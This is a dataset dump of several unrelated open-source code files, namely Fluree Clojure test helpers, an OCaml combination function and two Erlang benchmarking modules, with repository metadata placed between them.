(transact-schema name s :http))
(doseq [d (:clj/data params)]
(transact-data name d :clj))
(doseq [d (:http/data params)]
(transact-data name d :http))
name)))
(defn wait-for-system-ready
([timeout] (wait-for-system-ready system timeout))
([system timeout]
(print "Waiting for system to be ready ...") (flush)
(loop [sleep 0
elapsed 0]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(print ".") (flush)
(let [{:keys [status]} (-> system :group txproto/-state)
consensus-type (get-in system [:config :consensus :type])]
(if (and
(or (= :in-memory consensus-type)
(and (= :raft consensus-type)
(= :leader status)))
;; Sometimes even when this node is the raft leader or using
;; in-memory consensus we still don't yet have a default private
key to sign unsigned with ; so wait for that too
(-> system :group txproto/get-shared-private-key))
(println " Ready!")
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(when (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for system to become ready. Max is "
timeout "ms."))))
(recur 1000 elapsed))))))))
(defn test-system
"This fixture is intended to be used like this:
(use-fixture :once test-system)
It starts up an in-memory (by default) ledger server for testing and waits
for it to be ready to use. It does not create any ledgers. You might find
the rand-ledger fn useful for that."
([tests] (test-system {} tests))
([opts tests]
(try
(start* opts)
(wait-for-system-ready init-timeout-ms)
(tests)
(catch Throwable e
(log/error e "Caught test exception")
(throw e))
(finally (stop*)))))
(defn create-auths
"Creates 3 auths in the given ledger: root, all persons, all persons no
handles. Returns of vector of [key-maps create-txn-result]."
([ledger] (create-auths ledger (:conn system)))
([ledger conn]
(let [keys (vec (repeatedly 3 fdb-auth/new-private-key))
add-auth [{:_id "_auth"
:id (get-in keys [0 :id])
:roles [["_role/id" "root"]]}
{:_id "_auth"
:id (get-in keys [1 :id])
:roles ["_role$allPersons"]}
{:_id "_auth"
:id (get-in keys [2 :id])
:roles ["_role$noHandles"]}
{:_id "_role$allPersons"
:id "allPersons"
:rules ["_rule$allPersons"]}
{:_id "_role$noHandles"
:id "noHandles"
:rules ["_rule$allPersons" "_rule$noHandles"]}
{:_id "_rule$allPersons"
:id "role$allPersons"
:collection "person"
:collectionDefault true
:fns [["_fn/name" "true"]]
:ops ["all"]}
{:_id "_rule$noHandles"
:id "noHandles"
:collection "person"
:predicates ["person/handle"]
:fns [["_fn/name" "false"]]
:ops ["all"]}]]
[keys (->> add-auth
(fdb/transact-async conn ledger)
<!!)])))
(defn create-temp-dir ^File
[]
(let [base-dir (io/file (System/getProperty "java.io.tmpdir"))
dir-path (io/file base-dir (str (System/currentTimeMillis) "-"
(long (rand 10000000000000))))]
(if (.mkdirs dir-path)
dir-path
(throw (ex-info "Failed to create temp directory"
{:dir-path dir-path})))))
(defn assert-success
[result]
(if (instance? Throwable result)
(throw result)
result))
(defn printlnn
[& s]
(apply println (concat s ["\n"])))
;; ======================== DEPRECATED ===============================
(defn ^:deprecated test-system-deprecated
"This fixture is deprecated. As tests are converted to the more idiomatic
approach, use the new test-system :once fixture w/ rand-ledger calls in each
test instead."
([f]
(test-system-deprecated {} f))
([opts f]
(try
(do (start opts)
(wait-for-system-ready init-timeout-ms)
(init-ledgers!)
(f))
:success
(catch Exception e
(log/error e "Caught test exception")
e)
(finally (stop)))))
(defn safe-Throwable->map [v]
(if (isa? (class v) Throwable)
(Throwable->map v)
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn extract-errors [v]
(if (isa? (class v) Throwable)
(or (some-> (ex-data v) (assoc :message (ex-message v)))
(Throwable->map v))
(do
(println "Not a throwable:" (pr-str v))
v)))
(defn get-tempid-count
"Returns count of tempids within a collection, given the tempid map from the returned transaction
and a collection name."
[tempids collection]
(let [collection-tempids (get tempids collection)]
(when-not (sequential? collection-tempids)
(throw (ex-info (str "Unable to get collection range from tempid map for: " collection)
{:tempids tempids
:collection collection})))
(let [[start-sid end-sid] collection-tempids]
(inc (- end-sid start-sid)))))
(defn contains-every?
"Returns true if and only if map m contains every key supplied in subsequent
args ks. Uses (contains? m k) so the same semantics apply (e.g. checks for
map keys not values).
NB: This is NOT the same as set equality. It checks that the set contents of
m is a (non-strict) superset of ks. In other words, m can have more than ks,
but must have all of ks."
[m & ks]
(every? #(contains? m %) ks))
| null | https://raw.githubusercontent.com/fluree/ledger/af93dd2f0261cabed58fadedbe215e828d38cb44/test/fluree/db/test_helpers.clj | clojure | seeing some intermittent failures to initialize sometimes
so this starts outputting some diagnostic messages once
if we figure out what 's
wrong, can remove the (when ...) form below and the (do ...)
wrapper
check for any immediate errors (like invalid names) in create requests
Sometimes even when this node is the raft leader or using
in-memory consensus we still don't yet have a default private
so wait for that too
======================== DEPRECATED =============================== | (ns fluree.db.test-helpers
(:require [clojure.test :refer :all]
[clojure.core.async :as async :refer [<!!]]
[fluree.db.server :as server]
[fluree.db.api :as fdb]
[fluree.db.server-settings :as setting]
[fluree.db.util.log :as log]
[clojure.java.io :as io]
[clojure.edn :as edn]
[fluree.db.util.json :as json]
[org.httpkit.client :as http]
[fluree.db.api.auth :as fdb-auth]
[fluree.db.ledger.txgroup.txgroup-proto :as txproto]
[clojure.string :as str])
(:import (java.net ServerSocket)
(java.util UUID)
(java.io File)))
(def ^:constant init-timeout-ms 120000)
(defn get-free-port []
(let [socket (ServerSocket. 0)]
(.close socket)
(.getLocalPort socket)))
(def port (delay (get-free-port)))
(def alt-port (delay (get-free-port)))
(def config (delay (setting/build-env
{:fdb-mode "dev"
:fdb-group-servers "DEF@localhost:11001"
:fdb-group-this-server "DEF"
:fdb-storage-type "memory"
:fdb-api-port @port
:fdb-consensus-type "in-memory"})))
(def system nil)
(def ledger-endpoints "fluree/api")
(def ledger-query+transact "fluree/querytransact")
(def ledger-chat "fluree/chat")
(def ledger-crypto "fluree/crypto")
(def ledger-voting "fluree/voting")
(def ledger-supplychain "fluree/supplychain")
(def ledger-todo "fluree/todo")
(def ledger-invoice "fluree/invoice")
(def ledger-mutable "fluree/mutable")
(def all-ledgers
#{ledger-endpoints ledger-query+transact ledger-chat ledger-crypto
ledger-voting ledger-supplychain ledger-todo ledger-invoice})
(defn print-banner [msg]
(println "\n*************************************\n\n"
msg
"\n\n*************************************"))
(defn start*
[& [opts]]
(alter-var-root #'system (constantly (server/startup (merge @config opts)))))
(defn start
[& [opts]]
(print-banner "STARTING")
(start* opts)
:started)
(defn stop* []
(alter-var-root #'system (fn [s] (when s (server/shutdown s)))))
(defn stop []
(print-banner "STOPPING")
(stop*)
:stopped)
(defn check-if-ready
"Kicks off simultaneous asynchronous ledger-ready? checks for every ledger in
ledgers. Returns a core.async channel that will be filled with vectors like
[ledger ready?] as they become available and then closed when all have been
returned."
[conn ledgers]
(let [res-ch (async/chan (count ledgers))
puts (atom 0)]
(dorun
(for [ledger ledgers]
(async/take! (fdb/ledger-ready?-async conn ledger)
#(async/put! res-ch [ledger %]
(fn [_]
(swap! puts inc)
(when (= @puts (count ledgers))
(async/close! res-ch)))))))
res-ch))
(defn wait-for-init
([conn ledgers] (wait-for-init conn ledgers init-timeout-ms))
([conn ledgers timeout]
(loop [sleep 0
elapsed 0
ledgers ledgers]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(let [ready-checks (check-if-ready conn ledgers)
ready-ledgers (<!! (async/reduce
(fn [rls [ledger ready?]]
(assoc rls ledger ready?))
{} ready-checks))]
(when (not-every? second ready-ledgers)
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(if (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for test ledgers to initialize. Max is "
timeout "ms.")))
(let [poky-ledgers (remove second ready-ledgers)]
(when (<= 80 (* 100 (/ elapsed timeout)))
(println "Running out of time for ledgers to init"
(str "(~" (- timeout elapsed) "ms remaining).")
"Waiting on" (count poky-ledgers)
"ledger(s) to initialize:"
(pr-str (map first poky-ledgers))))
(recur 1000 elapsed
(map first (remove second ready-ledgers))))))))))))
(defn init-ledgers!
"Creates ledgers and waits for them to be ready.
0-arity version creates fluree.db.test-helpers/all-ledgers.
1-and-2-arity versions take a collection of ledger names or maps that look
like: {:name \"ledger-name\", :opts opts-map-to-new-ledger}.
2-arity version takes an alternate system as the first arg (defaults to
fluree.db.test-helpers/system)."
([] (init-ledgers! system all-ledgers))
([ledgers] (init-ledgers! system ledgers))
([{:keys [conn] :as _system} ledgers]
(let [ledgers-with-opts (map #(if (map? %) % {:name %}) ledgers)
results (doall
(for [{ledger :name, opts :opts} ledgers-with-opts]
(fdb/new-ledger-async conn ledger opts)))]
(when-let [result (some #(when (instance? Exception %) %)
(map async/poll! results))]
(throw (ex-info (str "Error creating at least one test ledger: "
(ex-message result))
{:cause result})))
(wait-for-init conn (map :name ledgers-with-opts)))))
(defn standard-request
([body]
(standard-request body {}))
([body opts]
{:headers (cond-> {"content-type" "application/json"}
(:token opts) (assoc "Authorization" (str "Bearer " (:token opts))))
:body (json/stringify body)}))
(def endpoint-url-short (str ":" @port "/fdb/"))
(defn safe-update
"Like update but takes a predicate fn p that is first run on the current
value for key k in map m. Iff p returns truthy does the update take place."
[m k p f]
(let [v (get m k)]
(if (p v)
(update m k f)
m)))
(defn transact-resource
  "Transacts the type (keyword form of test-resources subdirectory) of resource
  with filename file. Optional api arg can be either :http (default) or :clj to
  indicate which API to use for the transaction. :clj can be useful under
  closed-api mode since this doesn't sign the HTTP requests."
  ([type ledger file] (transact-resource type ledger file :http))
  ([type ledger file api]
   (let [;; normalize to an .edn filename, then read the tx off the
         ;; classpath from "<type>/<filename>"
         filename (if (str/ends-with? file ".edn") file (str file ".edn"))
         tx (->> filename (str (name type) "/") io/resource slurp edn/read-string)]
     (case api
       :clj
       @(fdb/transact (:conn system) ledger tx)
       :http
       ;; POST the tx to the ledger's /transact endpoint; string JSON bodies
       ;; are parsed back into data. Note: `case` throws on any other api
       ;; value (no default clause).
       (let [endpoint (str endpoint-url-short ledger "/transact")]
         (-> tx
             standard-request
             (->> (http/post endpoint))
             deref
             (safe-update :body string? json/parse)))))))
;; Convenience partials over transact-resource with the resource type baked
;; in; the :arglists metadata preserves the useful call shapes for doc tools.
(def ^{:arglists '([ledger file] [ledger file api])
       :doc "Like transact-resource but bakes in :schemas as the first arg."}
  transact-schema
  (partial transact-resource :schemas))

(def ^{:arglists '([ledger file] [ledger file api])
       :doc "Like transact-resource but bakes in :data as the first arg."}
  transact-data
  (partial transact-resource :data))
(defn load-keys
  "Loads and parses the EDN key file \"keys/<key-name>.edn\" from the
  classpath. Returns nil when key-name is nil or when no such resource
  exists."
  [key-name]
  (when key-name
    (some-> (io/resource (str "keys/" key-name ".edn"))
            slurp
            edn/read-string)))
(defn rand-ledger
  "Generate a random, new, empty ledger with base-name prefix. Waits for it to
  be ready and then returns its name as a string.
  Also takes an optional second map arg with the keys:
  - :opts that will be passed to fluree.db.api/new-ledger-async
  - :http/schema schema resource filenames that will be transacted with the HTTP API
  - :clj/schema schema resource filenames that will be transacted with the CLJ API
  - :http/data data resource filenames that will be transacted with the HTTP API
  - :clj/data data resource filenames that will be transacted with the CLJ API"
  ([base-name] (rand-ledger base-name {}))
  ([base-name params]
   (let [;; default to a "test/" prefix unless base-name already includes one
         base-name* (if (str/includes? base-name "/")
                      base-name
                      (str "test/" base-name))
         ;; random suffix keeps parallel test runs from colliding
         name (str base-name* "-" (UUID/randomUUID))]
     (init-ledgers! [{:name name, :opts (:opts params)}])
     ;; transact schemas before data; :clj before :http for each
     (doseq [s (:clj/schema params)]
       (transact-schema name s :clj))
     (doseq [s (:http/schema params)]
       (transact-schema name s :http))
     (doseq [d (:clj/data params)]
       (transact-data name d :clj))
     (doseq [d (:http/data params)]
       (transact-data name d :http))
     name)))
(defn wait-for-system-ready
  "Blocks until the ledger system reports ready, polling once per second and
  printing progress dots. Throws a RuntimeException once the accumulated
  wait reaches `timeout` ms. Ready means: consensus type is :in-memory (or
  :raft with a :leader status) AND the group's shared private key is
  available."
  ([timeout] (wait-for-system-ready system timeout))
  ([system timeout]
   (print "Waiting for system to be ready ...") (flush)
   (loop [sleep 0      ; no sleep before the first probe, 1000ms afterwards
          elapsed 0]
     (let [start (System/currentTimeMillis)]
       (Thread/sleep sleep)
       (print ".") (flush)
       (let [{:keys [status]} (-> system :group txproto/-state)
             consensus-type (get-in system [:config :consensus :type])]
         (if (and
               (or (= :in-memory consensus-type)
                   (and (= :raft consensus-type)
                        (= :leader status)))
               (-> system :group txproto/get-shared-private-key))
           (println " Ready!")
           ;; elapsed includes both the sleep and the probe time of this
           ;; iteration
           (let [split (- (System/currentTimeMillis) start)
                 elapsed (+ elapsed split)]
             (when (>= elapsed timeout)
               (throw (RuntimeException.
                        (str "Waited " elapsed
                             "ms for system to become ready. Max is "
                             timeout "ms."))))
             (recur 1000 elapsed))))))))
(defn test-system
  "This fixture is intended to be used like this:
  (use-fixture :once test-system)
  It starts up an in-memory (by default) ledger server for testing and waits
  for it to be ready to use. It does not create any ledgers. You might find
  the rand-ledger fn useful for that."
  ([tests] (test-system {} tests))
  ([opts tests]
   (try
     (start* opts)
     (wait-for-system-ready init-timeout-ms)
     (tests)
     (catch Throwable e
       ;; log for visibility, then rethrow so the test run still fails
       (log/error e "Caught test exception")
       (throw e))
     ;; always shut the system down, even on failure
     (finally (stop*)))))
(defn create-auths
  "Creates 3 auths in the given ledger: root, all persons, all persons no
  handles. Returns a vector of [key-maps create-txn-result]."
  ([ledger] (create-auths ledger (:conn system)))
  ([ledger conn]
   (let [;; one fresh private key per auth record, in order: root,
         ;; allPersons, noHandles
         keys (vec (repeatedly 3 fdb-auth/new-private-key))
         add-auth [{:_id "_auth"
                    :id (get-in keys [0 :id])
                    :roles [["_role/id" "root"]]}
                   {:_id "_auth"
                    :id (get-in keys [1 :id])
                    :roles ["_role$allPersons"]}
                   {:_id "_auth"
                    :id (get-in keys [2 :id])
                    :roles ["_role$noHandles"]}
                   {:_id "_role$allPersons"
                    :id "allPersons"
                    :rules ["_rule$allPersons"]}
                   {:_id "_role$noHandles"
                    :id "noHandles"
                    :rules ["_rule$allPersons" "_rule$noHandles"]}
                   {:_id "_rule$allPersons"
                    ;; NOTE(review): this rule's :id is "role$allPersons"
                    ;; while the other rule uses a plain id ("noHandles");
                    ;; confirm the "role$" prefix here is intended.
                    :id "role$allPersons"
                    :collection "person"
                    :collectionDefault true
                    :fns [["_fn/name" "true"]]
                    :ops ["all"]}
                   {:_id "_rule$noHandles"
                    :id "noHandles"
                    :collection "person"
                    :predicates ["person/handle"]
                    :fns [["_fn/name" "false"]]
                    :ops ["all"]}]]
     ;; block on the transaction and pair the generated keys with its result
     [keys (->> add-auth
                (fdb/transact-async conn ledger)
                <!!)])))
(defn create-temp-dir ^File
  "Creates and returns a fresh, unique temporary directory (as a File).
  Throws ex-info when the directory cannot be created."
  []
  ;; Files/createTempDirectory is atomic and collision-free, unlike the
  ;; previous currentTimeMillis+rand naming scheme, which could race when
  ;; tests create temp dirs concurrently.
  (try
    (.toFile (java.nio.file.Files/createTempDirectory
               "fluree-test"
               (make-array java.nio.file.attribute.FileAttribute 0)))
    (catch java.io.IOException e
      (throw (ex-info "Failed to create temp directory"
                      {:cause e})))))
(defn assert-success
  "Identity for ordinary values; rethrows `result` when it is a Throwable.
  Handy for failing fast on error values returned through channels."
  [result]
  (when (instance? Throwable result)
    (throw result))
  result)
(defn printlnn
  "Like println, but passes an extra \"\\n\" as the final argument so the
  output is followed by a blank line."
  [& args]
  (apply println (conj (vec args) "\n")))
(defn ^:deprecated test-system-deprecated
  "This fixture is deprecated. As tests are converted to the more idiomatic
  approach, use the new test-system :once fixture w/ rand-ledger calls in each
  test instead."
  ([f]
   (test-system-deprecated {} f))
  ([opts f]
   (try
     (do (start opts)
         (wait-for-system-ready init-timeout-ms)
         (init-ledgers!)
         (f))
     ;; the try body's last expression, so :success is returned on success
     :success
     (catch Exception e
       ;; NOTE(review): the exception is logged and returned as a value, not
       ;; rethrown -- confirm this best-effort behavior is intended.
       (log/error e "Caught test exception")
       e)
     (finally (stop)))))
(defn safe-Throwable->map
  "Converts v with Throwable->map when it is a Throwable; otherwise prints
  a diagnostic and returns v unchanged."
  [v]
  (if (instance? Throwable v)
    (Throwable->map v)
    (do
      (println "Not a throwable:" (pr-str v))
      v)))
(defn extract-errors
  "For a Throwable v, returns its ex-data with the message added under
  :message, falling back to Throwable->map when there is no ex-data.
  Non-throwables are printed as a diagnostic and returned unchanged."
  [v]
  (if-not (instance? Throwable v)
    (do
      (println "Not a throwable:" (pr-str v))
      v)
    (if-let [data (ex-data v)]
      (assoc data :message (ex-message v))
      (Throwable->map v))))
(defn get-tempid-count
  "Returns count of tempids within a collection, given the tempid map from
  the returned transaction and a collection name. Throws when the tempid map
  has no sequential [start-sid end-sid] range for that collection."
  [tempids collection]
  (let [sid-range (get tempids collection)]
    (if (sequential? sid-range)
      (let [[start-sid end-sid] sid-range]
        (inc (- end-sid start-sid)))
      (throw (ex-info (str "Unable to get collection range from tempid map for: " collection)
                      {:tempids tempids
                       :collection collection})))))
(defn contains-every?
  "Returns true if and only if map m contains every key supplied in
  subsequent args ks. Uses (contains? m k), so keys are checked, not values.
  This is NOT set equality: m may contain extra keys beyond ks, it just has
  to have at least all of ks."
  [m & ks]
  (every? (partial contains? m) ks))
|
e87e659c8aef844a6fd66f4786baeba44c2e090baa92e24ffc8dcbfa832fe38f | kaznum/programming_in_ocaml_exercise | comb.ml | let rec comb (n, m) =
  (* Pascal's rule: C(n,0) = C(n,n) = 1, otherwise
     C(n,m) = C(n-1,m) + C(n-1,m-1). Plain recursion, so runtime grows
     exponentially in n. *)
  if m = 0 || m = n then 1
  else
    comb (n - 1, m) + comb (n - 1, m - 1);;
| null | https://raw.githubusercontent.com/kaznum/programming_in_ocaml_exercise/6f6a5d62a7a87a1c93561db88f08ae4e445b7d4e/ex3.11/comb.ml | ocaml | let rec comb (n, m) =
  (* Pascal's rule: C(n,0) = C(n,n) = 1, otherwise
     C(n,m) = C(n-1,m) + C(n-1,m-1). Plain recursion, so runtime grows
     exponentially in n. *)
  if m = 0 || m = n then 1
  else
    comb (n - 1, m) + comb (n - 1, m - 1);;
| |
f0a5dec0040ba600a8aff1d88d6dfa6629085012e7b395c52a230eea6a39033a | lpgauth/foil | foil_bench.erl | -module(foil_bench).
-export([
run/0
]).
-define(B, 1000). % batch size
-define(C, 2048). % concurrency
-define(N, 2048). % iterations
%% Benchmarked value shapes: one {Label, Value} pair per case.
-define(T, [
    {atom, test},
    {binary, <<0:1024>>},
    {complex, {test, [<<"test">>, "test"]}},
    {list, "test"},
    {tuple, {test, test2}}
]).
%% public
-spec run() ->
    ok.
%% Entry point: silence tty logging, start the foil app, print the result
%% header and benchmark every case in ?T, then stop the app.
run() ->
    error_logger:tty(false),
    foil_app:start(),
    io:format("~23s ~6s ~6s ~6s~n", [name, mean, p99, p999]),
    run(?T, ?C, ?N),
    foil_app:stop().
%% private
%% Returns the value stored under Key in a list of {Key, Value} tuples,
%% or 'undefined' when no matching tuple exists.
lookup(Key, Props) ->
    case lists:keyfind(Key, 1, Props) of
        {_, Value} -> Value;
        false -> undefined
    end.
%% Builds the printable benchmark id, e.g. name(ets, atom) -> ets_atom.
name(Prefix, Suffix) ->
    list_to_atom(lists:concat([Prefix, "_", Suffix])).
%% Runs the ets / foil-indirect / foil-direct benchmark variants for each
%% {Type, Value} case in turn.
run([], _C, _N) ->
    ok;
run([{Type, Value} | T], C, N) ->
    run_ets(Type, Value, C, N),
    run_foil_indirect(Type, Value, C, N),
    run_foil_direct(Type, Value, C, N),
    run(T, C, N).
%% Warms Fun up with 10k untimed calls, measures it with timing_hdr, and
%% prints mean/p99/p999 normalized by the ?B batch size. Raw results are
%% also written under output/<Name>.
run(Name, Fun, C, N) ->
    [Fun() || _ <- lists:seq(1, 10000)],
    Results = timing_hdr:run(Fun, [
        {name, Name},
        {concurrency, C},
        {iterations, N},
        {output, "output/" ++ atom_to_list(Name)}
    ]),
    Mean = lookup(mean, Results) / ?B,
    P99 = lookup(p99, Results) / ?B,
    P999 = lookup(p999, Results) / ?B,
    io:format("~23s ~6.3f ~6.3f ~6.3f~n", [Name, Mean, P99, P999]).
%% Baseline: each timed call does ?B+1 reads of a pre-inserted key from a
%% public named ETS table (seeded with 101 filler rows).
run_ets(Type, Value, C, N) ->
    ets:new(?MODULE, [named_table, public, {read_concurrency, true}]),
    [ets:insert(?MODULE, {X, <<"foo">>}) || X <- lists:seq(0, 100)],
    ets:insert(?MODULE, {test, Value}),
    Fun = fun() ->
        [Value = ets:lookup_element(?MODULE, test, 2) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(ets, Type), Fun, C, N),
    ets:delete(?MODULE).
%% foil "direct": calls foil_bench_foil:lookup/1 straight, bypassing the
%% foil:lookup/2 dispatch used by the indirect variant.
%% NOTE(review): foil_bench_foil is presumably the module foil generates
%% for ?MODULE after foil:load/1 -- confirm; the sleep below presumably
%% gives that load time to complete.
run_foil_direct(Type, Value, C, N) ->
    foil:new(?MODULE),
    [foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
    foil:insert(?MODULE, test, Value),
    foil:load(?MODULE),
    timer:sleep(500),
    Fun = fun() ->
        [{ok, Value} = foil_bench_foil:lookup(test) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(foil_direct, Type), Fun, C, N),
    foil:delete(?MODULE).
%% foil "indirect": same setup as run_foil_direct, but each lookup goes
%% through the generic foil:lookup/2 API.
run_foil_indirect(Type, Value, C, N) ->
    foil:new(?MODULE),
    [foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
    foil:insert(?MODULE, test, Value),
    foil:load(?MODULE),
    timer:sleep(500),
    Fun = fun() ->
        [{ok, Value} = foil:lookup(?MODULE, test) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(foil_indirect, Type), Fun, C, N),
    foil:delete(?MODULE).
| null | https://raw.githubusercontent.com/lpgauth/foil/e462829855a745d8f20fb0508ae3eb8e323b03bd/test/foil_bench.erl | erlang | batch size
concurrency
iterations
public
private | -module(foil_bench).
%% Micro-benchmark comparing raw ETS reads against foil's generated-module
%% lookups (direct and indirect) for several value shapes.
-export([
    run/0
]).

%% Benchmarked value shapes: one {Label, Value} pair per case.
%% NOTE(review): the ?B/?C/?N macros used below have no -define lines in
%% this copy (the upstream module defines B=1000 batch size, C=2048
%% concurrency, N=2048 iterations); confirm before compiling.
-define(T, [
    {atom, test},
    {binary, <<0:1024>>},
    {complex, {test, [<<"test">>, "test"]}},
    {list, "test"},
    {tuple, {test, test2}}
]).

%% Entry point: starts the foil app, prints the result header, benchmarks
%% every case in ?T and stops the app.
-spec run() ->
    ok.
run() ->
    error_logger:tty(false),
    foil_app:start(),
    io:format("~23s ~6s ~6s ~6s~n", [name, mean, p99, p999]),
    run(?T, ?C, ?N),
    foil_app:stop().

%% Value stored under Key in a {Key, Value} list, or 'undefined'.
lookup(Key, List) ->
    case lists:keyfind(Key, 1, List) of
        false -> undefined;
        {_, Value} -> Value
    end.

%% Printable benchmark id, e.g. name(ets, atom) -> ets_atom.
name(Name, Type) ->
    list_to_atom(atom_to_list(Name) ++ "_" ++ atom_to_list(Type)).

%% Runs all three benchmark variants for each {Type, Value} case.
run([], _C, _N) ->
    ok;
run([{Type, Value} | T], C, N) ->
    run_ets(Type, Value, C, N),
    run_foil_indirect(Type, Value, C, N),
    run_foil_direct(Type, Value, C, N),
    run(T, C, N).

%% Warms Fun up, measures it with timing_hdr, prints mean/p99/p999
%% normalized by the ?B batch size.
run(Name, Fun, C, N) ->
    [Fun() || _ <- lists:seq(1, 10000)],
    Results = timing_hdr:run(Fun, [
        {name, Name},
        {concurrency, C},
        {iterations, N},
        {output, "output/" ++ atom_to_list(Name)}
    ]),
    Mean = lookup(mean, Results) / ?B,
    P99 = lookup(p99, Results) / ?B,
    P999 = lookup(p999, Results) / ?B,
    io:format("~23s ~6.3f ~6.3f ~6.3f~n", [Name, Mean, P99, P999]).

%% Baseline: ?B+1 ETS reads of a pre-inserted key per timed call.
run_ets(Type, Value, C, N) ->
    ets:new(?MODULE, [named_table, public, {read_concurrency, true}]),
    [ets:insert(?MODULE, {X, <<"foo">>}) || X <- lists:seq(0, 100)],
    ets:insert(?MODULE, {test, Value}),
    Fun = fun() ->
        [Value = ets:lookup_element(?MODULE, test, 2) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(ets, Type), Fun, C, N),
    ets:delete(?MODULE).

%% foil "direct": lookups via the foil_bench_foil module.
run_foil_direct(Type, Value, C, N) ->
    foil:new(?MODULE),
    [foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
    foil:insert(?MODULE, test, Value),
    foil:load(?MODULE),
    timer:sleep(500),
    Fun = fun() ->
        [{ok, Value} = foil_bench_foil:lookup(test) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(foil_direct, Type), Fun, C, N),
    foil:delete(?MODULE).

%% foil "indirect": lookups through the generic foil:lookup/2 API.
run_foil_indirect(Type, Value, C, N) ->
    foil:new(?MODULE),
    [foil:insert(?MODULE, X, <<"foo">>) || X <- lists:seq(0, 100)],
    foil:insert(?MODULE, test, Value),
    foil:load(?MODULE),
    timer:sleep(500),
    Fun = fun() ->
        [{ok, Value} = foil:lookup(?MODULE, test) || _ <- lists:seq(0, ?B)],
        ok
    end,
    run(name(foil_indirect, Type), Fun, C, N),
    foil:delete(?MODULE).
|
3c443843b60b492a2e174bba1db9b90992cb8a98886207a9639b2bbad2264d35 | vascokk/rivus_cep | basho_bench_driver_rivus.erl | -module(basho_bench_driver_rivus).
-compile([{parse_transform, lager_transform}]).
-export([new/1, run/4]).
-include("basho_bench.hrl").
%% Per-worker driver state, built once in new/1.
-record(state, {
    host,       % rivus server host (from the rivus_cep_tcp_serv config)
    port,       % rivus server port
    socket,     % connected gen_tcp socket (passive, binary, {packet, 4})
    client_num  % basho_bench worker id; substituted for $ in query templates
}).
%% basho_bench callback: connects to the rivus server, deploys this
%% worker's queries (Id is substituted into the templates) and returns
%% the worker state.
new(Id) ->
    {Host, Port, Socket} = connect(),
    deploy_queries(Socket, Id),
    {ok, #state{
        host = Host,
        port = Port,
        socket = Socket,
        client_num = Id}}.
%% new(_Id) ->
%% {Host, Port, Socket} = connect(),
%%
%% {ok, #state{
%% host = Host,
%% port = Port,
%% socket = Socket}}.
%% Opens a passive, binary, length-prefixed ({packet, 4}) TCP connection
%% to the host/port from the rivus_cep_tcp_serv config entry. Crashes the
%% worker (badmatch) when the connection fails.
connect() ->
    {Host, Port} = basho_bench_config:get(rivus_cep_tcp_serv),
    {ok, Socket} = gen_tcp:connect(Host, Port, [{active, false}, {nodelay, true}, {packet, 4}, binary]),
    {Host, Port, Socket}.
%% Deploys every {Type, Query} template from config, replacing each $ in
%% the statement with this worker's Id so per-client queries don't collide.
deploy_queries(Socket, Id) ->
    Queries = basho_bench_config:get(rivus_cep_queries, []),
    lists:foreach(fun({Type, Query}) ->
        Q = re:replace(Query, "\\$", integer_to_list(Id), [global, {return, list}]),
        lager:info("Deploying query type: ~p, client: ~p, stmt: ~p", [Type, Id, Q]),
        execute(Type, Q, Socket) end, Queries).
%% Sends a load_query request for the statement: 'query' templates are
%% deployed under the benchmark_test tag, 'event' templates under
%% benchmark_event. Crashes on send failure (ok = ...).
execute(query, Query, Socket) ->
    ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_test], [], []}}));
execute(event, Query, Socket) ->
    ok = gen_tcp:send(Socket, term_to_binary({load_query, {Query, [benchmark_event], [], []}})).
%% Ships Event to the rivus server as {event, benchmark_test, Event}.
%% Returns {ok, State} on success; a gen_tcp error tuple is passed through
%% unchanged.
send_event(Event, #state{socket = Sock} = State) ->
    Payload = term_to_binary({event, benchmark_test, Event}),
    case gen_tcp:send(Sock, Payload) of
        ok -> {ok, State};
        Error -> Error
    end.
%% Benchmark events are just the generated value; the key generator is
%% ignored.
create_event(_KeyGen, ValueGen) ->
    ValueGen.
%% basho_bench callback for the 'notify' operation: sends one event and
%% then blocks on the server's reply on the same socket. Returns
%% {ok, State} or {error, Reason, State} as basho_bench expects.
run(notify, KeyGen, ValueGen, #state{socket = Socket} = State) ->
    Event = create_event(KeyGen, ValueGen),
    % Send message
    case send_event(Event, State) of
        {error, E} ->
            {error, E, State};
        {ok, State} ->
            case gen_tcp:recv(Socket, 0) of
                {ok, _} -> {ok, State};
                {error, E} -> {error, E, State}
            end
    end.
| null | https://raw.githubusercontent.com/vascokk/rivus_cep/e9fe6ed79201d852065f7fb2a24a880414031d27/priv/basho_bench_driver_rivus.erl | erlang | new(_Id) ->
{Host, Port, Socket} = connect(),
{ok, #state{
host = Host,
port = Port,
socket = Socket}}.
Send message | -module(basho_bench_driver_rivus).
%% basho_bench driver that benchmarks a rivus_cep server over TCP: each
%% worker connects, deploys its (id-parameterized) queries, then sends
%% events and waits for replies.
-compile([{parse_transform, lager_transform}]).
-export([new/1, run/4]).
-include("basho_bench.hrl").

%% Per-worker state, built once in new/1.
-record(state, {
    host,       % rivus server host (from rivus_cep_tcp_serv config)
    port,       % rivus server port
    socket,     % connected gen_tcp socket (passive, binary, {packet, 4})
    client_num  % basho_bench worker id; substituted for $ in query templates
}).

%% basho_bench callback: connect, deploy this worker's queries, return state.
new(Id) ->
    {Host, Port, Socket} = connect(),
    deploy_queries(Socket, Id),
    {ok, #state{
        host = Host,
        port = Port,
        socket = Socket,
        client_num = Id}}.

%% Opens a passive, length-prefixed TCP connection using the configured
%% host/port; crashes the worker (badmatch) when the connection fails.
connect() ->
    {Host, Port} = basho_bench_config:get(rivus_cep_tcp_serv),
    {ok, Socket} = gen_tcp:connect(Host, Port, [{active, false}, {nodelay, true}, {packet, 4}, binary]),
    {Host, Port, Socket}.

